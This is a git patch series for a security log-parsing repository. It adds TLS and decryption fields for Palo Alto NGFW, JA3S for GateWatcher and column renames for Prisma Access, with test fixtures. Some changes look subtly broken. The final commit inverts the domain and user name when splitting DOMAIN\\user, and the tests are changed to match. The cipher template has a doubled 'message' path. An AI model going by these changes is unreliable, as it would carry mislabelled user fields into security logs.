Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ea07e1d10..c4abfd388 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -651,6 +651,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -795,6 +802,9 @@ stages: paloalto.vsys: "{{parsed_description.message.vsys}}" paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}" paloalto.server.profile: "{{parsed_description.message.server_profile}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: paloalto.threat.type: > {%- set id = parsed_threat.message.threat_code | int -%} diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json new file mode 100644 index 000000000..bef30109a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json @@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file From c3dd2fd72690727297bbc75a2af3654af6dac91c Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:03:17 +0100 Subject: [PATCH 54/84] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-ngfw/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c4abfd388..944713355 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -425,6 +425,124 @@ pipeline: - ClusterName delimiter: "," + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json new file mode 100644 index 000000000..6a413f53b --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 84cf60f3488d4312a1f07df55bbcd5eae87e2e30 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:14:17 +0100 Subject: [PATCH 55/84] fix(GateWatcher): lint taxonomy --- GateWatcher/aioniq/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 07bae26e7..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -389,16 +389,16 @@ gatewatcher.tls: name: gatewatcher.tls type: text -gatewatcher.tls_sni: - description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls_sni - type: text - gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata name: gatewatcher.tls_fingerprint type: text +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp From 941d5826e98ca34ac5c66d22b6e2235eafbdf8b6 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:28:16 +0100 Subject: [PATCH 56/84] test(GateWatcher): Improve support of tls events --- GateWatcher/aioniq/ingest/parser.yml | 1 + GateWatcher/aioniq/tests/sigflow-tls.json | 68 +++++++++++++++++++++++ 2 files changed, 69 insertions(+) create mode 100644 GateWatcher/aioniq/tests/sigflow-tls.json diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 3cc13d747..869a7f8f3 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -215,3 +215,4 @@ stages: gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" tls.version: "{{json_load.message.tls.version}}" tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json new file mode 100644 index 000000000..ff8624608 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-tls.json @@ -0,0 +1,68 @@ +{ + "input": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ v102", + "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26" + } + } + }, + "expected": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", + "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } +} \ No newline at end of file From bd97efb6cdc757fa14e48c692ee1cdcfdc568f23 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:33:23 +0100 Subject: [PATCH 57/84] fix(GateWatcher): lint parser --- GateWatcher/aioniq/ingest/parser.yml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 869a7f8f3..845abe396 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -206,13 +206,13 @@ stages: tls: actions: - set: - tls.server.issuer: "{{json_load.message.tls.issuerdn}}" - tls.server.not_before: "{{json_load.message.tls.notbefore}}" - tls.server.certificate_chain: "{{json_load.message.tls.chain}}" - tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls: "{{json_load.message.tls}}" - gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" - tls.version: "{{json_load.message.tls.version}}" - tls.server.not_after: "{{json_load.message.tls.notafter}}" - tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" From e80062d46eef52b2721efe3f4b17c0a01dace43b Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:45:07 +0100 Subject: [PATCH 58/84] chore(PAloaAlto): name some columns --- .../paloalto-prisma-access/ingest/parser.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 113ef7fdb..7c7de00b8 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID @@ -235,12 +235,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID From 838a83c453d43ea013f72192a71ffd3350af2fba Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:46:41 +0100 Subject: [PATCH 59/84] fix(PaloAlto): fix the definition of the user properties --- .../paloalto-prisma-access/ingest/parser.yml | 4 ++-- .../paloalto-prisma-access/tests/decryption_cef.json | 5 +++-- .../paloalto-prisma-access/tests/fix_bug_with_int.json | 5 +++-- .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 5 +++-- .../paloalto-prisma-access/tests/test_globalprotect.json | 7 ++++--- .../paloalto-prisma-access/tests/test_userid.json | 6 +++--- 6 files changed, 18 insertions(+), 14 deletions(-) diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 7c7de00b8..84514974e 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -798,8 +798,8 @@ stages: set_finalize_user_name: actions: - set: - user.domain: '{{final.user.name.split("\\") | first}}' - user.name: '{{final.user.name.split("\\") | last}}' + user.domain: '{{final.user.name.split("\\") | last}}' + user.name: '{{final.user.name.split("\\") | first}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: user.domain: '{{final.user.email.split("@") | first}}' diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json index 1a4fba4b4..b32ea4d13 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json @@ -69,6 +69,7 @@ "1.1.1.1" ], "user": [ + "paloaltonetwork", "xxxxx" ] }, @@ -90,8 +91,8 @@ } }, "user": { - "domain": "paloaltonetwork", - "name": "xxxxx" + "domain": "xxxxx", + "name": "paloaltonetwork" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json index 512ae89e7..37c8000b9 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json @@ -62,6 +62,7 @@ "5.6.7.8" ], "user": [ + "domain", "pusername", "userdest" ] @@ -86,8 +87,8 @@ } }, "user": { - "domain": "domain", - "name": "pusername" + "domain": "pusername", + "name": "domain" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e4b1d5fab..e0cb016eb 100644 --- a/Palo Alto 